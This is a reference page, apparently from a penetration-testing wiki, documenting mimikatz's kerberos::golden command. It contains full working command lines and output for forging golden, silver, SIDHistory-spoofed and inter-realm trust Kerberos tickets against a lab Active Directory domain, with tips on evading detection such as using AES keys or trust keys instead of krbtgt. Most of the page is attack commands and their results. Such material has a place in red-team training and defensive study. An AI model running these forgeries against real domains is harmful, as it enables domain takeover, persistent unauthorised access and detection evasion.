golden
kerberos::golden can be used to forge golden and silver tickets. It can also be used for forging inter-realm trust keys. It has the following command line arguments:
  • /domain: the active directory domain (the user's domain to impersonate)
  • /sid: the SID of the active directory domain the user's hash is hold
  • /sids: the extra SID of the domain to target during the SIDHistory spoofing
  • /user: username to impersonate, keep in mind that Administrator is not the only name for this well-known account
  • /ticket: save the ticket to a .kirbi file
  • /groups: id of groups the user belongs (first is primary group, comma separator) - default is: 513,512,520,518,519 for the well-known Administrators groups
  • /id: The user RID. The default value is 500 (local administrator)
  • /target - the server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433)
  • /service - The service name for the silver ticket (ex: cifs, rpcss, http, mssql)
  • /ptt: inject the generated golden ticket into memory
  • /startoffset: The start offset when the ticket is available. Default is 0
  • /endin: The ticket's minutes lifetime. The default value is 10 years. The default active directory kerberos policy is 10 hours
  • /renewmax: The maximum ticket's minutes lifetime renewal. The default value is 10 years. The default active directory kerberos policy is 7 days
  • /krbtgt: specify the krbtgt RC4 key
  • /des: the DES key to be used
  • /rc4: the RC4 key to be used
  • /aes128: The AES128 key to be used. More opsec safe
  • /aes256: the AES256 key to be used. More opsec safe
  • /rodc: for generating a golden ticket with the krbtgt hash of a Read Only Domain Controller

Golden Ticket

The following are the requirements for generating a golden ticket.
  • A KRBTGT key. It can be of type RC4 (i.e. NT hash), DES or AES (depending on what etypes the domain supports and what level of stealth the attacker wants).
  • Domain name
  • Domain SID
  • The username to impersonate
  • The RID of the user account to impersonate. The RID is the rightmost number in a full SID (e.g. 500 for the built-in administrator account)
  • The group RIDs the account should be a member of. The RID is the rightmost number in a full SID (e.g. 512 for "Domain Admins", 519 for "Entreprise Admins").
1
mimikatz # kerberos::golden /domain:hacklab.local /sid:S-1-5-21-2725560159-1428537199-2260736313 /rc4:b5348d0a20a24a67ff544146a09cd292 /user:krbtgt /ticket:ticket.kirbi /groups:500,501,513,512,520,518,519
2
User : krbtgt
3
Domain : hacklab.local (HACKLAB)
4
SID : S-1-5-21-2725560159-1428537199-2260736313
5
User Id : 500
6
Groups Id : *500 501 513 512 520 518 519
7
ServiceKey: b5348d0a20a24a67ff544146a09cd292 - rc4_hmac_nt
8
Lifetime : 19/11/2021 02:55:47 ; 17/11/2031 02:55:47 ; 17/11/2031 02:55:47
9
-> Ticket : ticket.kirbi
10
​
11
* PAC generated
12
* PAC signed
13
* EncTicketPart generated
14
* EncTicketPart encrypted
15
* KrbCred generated
16
​
17
Final Ticket Saved to file !
Copied!

Sliver Ticket

The following are the requirements for generating a silver ticket.
1
mimikatz # kerberos::golden /domain:hacklab.local /sid:S-1-5-21-2725560159-1428537199-2260736313 /rc4:647dac3559c899c5fe4dad7723feb8c5 /user:m3g9tr0n /service:CIFS/dc.hacklab.local /target:dc.hacklab.local
2
User : m3g9tr0n
3
Domain : hacklab.local (HACKLAB)
4
SID : S-1-5-21-2725560159-1428537199-2260736313
5
User Id : 500
6
Groups Id : *513 512 520 518 519
7
ServiceKey: 647dac3559c899c5fe4dad7723feb8c5 - rc4_hmac_nt
8
Service : CIFS/dc.hacklab.local
9
Target : dc.hacklab.local
10
Lifetime : 19/11/2021 02:59:22 ; 17/11/2031 02:59:22 ; 17/11/2031 02:59:22
11
-> Ticket : ticket.kirbi
12
​
13
* PAC generated
14
* PAC signed
15
* EncTicketPart generated
16
* EncTicketPart encrypted
17
* KrbCred generated
18
​
19
Final Ticket Saved to file !
Copied!

Golden ticket & SIDHistory spoofing

When Forest Trust Relationship is bi-directional, it is possible to escalate from a child domain to a parent root domain by doing SIDHistory spoofing.
1
mimikatz #kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name> /ticket:ticket.kirbi /sids:<sid_of_parent_domain>
2
​
3
kerberos::golden /user:Administrator /domain:child.hacklab.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:krbtgt_tkt.kirbi
4
User : Administrator
5
Domain : child.hacklab.local (CHILD)
6
SID : S-1-5-21-1874506631-3219952063-538504511
7
User Id : 500
8
Groups Id : *513 512 520 518 519
9
Extra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;
10
ServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt
11
Lifetime : 19/11/2021 1:02:13 AM ; 5/6/2030 1:02:13 AM ; 5/6/2030 1:02:13 AM
12
-> Ticket : C:\krbtgt_tkt.kirbi
13
​
14
* PAC generated
15
* PAC signed
16
* EncTicketPart generated
17
* EncTicketPart encrypted
18
* KrbCred generated
19
​
20
Final Ticket Saved to file !
Copied!

Inter-Realm Trust Tickets

To acquire the forest trust keys the command lsadump::trust /patch has to be used. Depending on the forest trust relationship, using the trust key instead of the krbtgt account can be stealthier since most defense mechanisms are monitoring the krbtgt account.
1
mimikatz # kerberos::golden /user:<user_name> /domain:<domain_name> /sid:<domain_sid> /sids:<sid_of_target_domain> /rc4:<trust_key_RC4_key> /service:krbtgt /target:<the_target_domain> /ticket:<file_to_save>
2
​
3
kerberos::golden /user:Administrator /domain:hacklab.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-3146393536-1393405867-2905981701-519 /rc4:172ad9986a524aadaf4d01c1ce7f240f /service:krbtgt /target:bank.local /ticket:trust_tkt.kirbi
4
​
5
User : Administrator
6
Domain : hacklab.local (HACKLAB)
7
SID : S-1-5-21-1874506631-3219952063-538504511
8
User Id : 500
9
Groups Id : *513 512 520 518 519
10
Extra SIDs: S-1-5-21-3146393536-1393405867-2905981701-519 ;
11
ServiceKey: 172ad9986a524aadaf4d01c1ce7f240f - rc4_hmac_nt
12
Service : krbtgt
13
Target : bank.local
14
Lifetime : 19/11/2021 3:01:44 AM ; 5/6/2030 3:01:44 AM ; 5/6/2030 3:01:44 AM
15
-> Ticket : C:\trust_tkt-us.kirbi
16
* PAC generated
17
* PAC signed
18
* EncTicketPart generated
19
* EncTicketPart encrypted
20
* KrbCred generated
21
Final Ticket Saved to file !
Copied!
Last modified 6mo ago